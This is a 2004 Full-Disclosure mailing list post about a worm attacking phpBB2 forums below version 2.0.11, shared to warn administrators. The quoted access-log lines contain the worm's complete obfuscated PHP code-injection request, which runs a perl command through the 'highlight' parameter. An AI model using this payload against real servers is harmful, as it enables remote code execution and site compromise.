[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] Re: Worm hitting PHPbb2 Forums
- To: "L. Walker" <lwalker@xxxxxxxxxxx>
- Subject: [Full-Disclosure] Re: Worm hitting PHPbb2 Forums
- From: mark@xxxxxxxxx
- Date: Tue, 21 Dec 2004 10:47:03 -0700
Front what I have read, this can happen in any phpbb version lower than 2.0.11
This exploit is becoming frequent. Normally uploading a ddos bot.
Mark
Quoting "L. Walker" <lwalker@xxxxxxxxxxx>:
> Just spotted two clients hit by this. One client didnt update his
> software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16.
> Chkrootkit says its Adore, however could be something else. Datacenter
> wasn't very smart and has since wiped the server, so no binaries or other
> evidence.
>
> Generation 12 only wiped out PHP files, replacing them with its own
> message on other client's PHPbb2 forum. Access logs show:
>
> 66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
>
/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527
> HTTP/1.0" 200 270
>
"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527"
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
>
> --
> L. Walker <lwalker at magi dot net dot au>
> Network Administrator / Consultant
> --
>
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html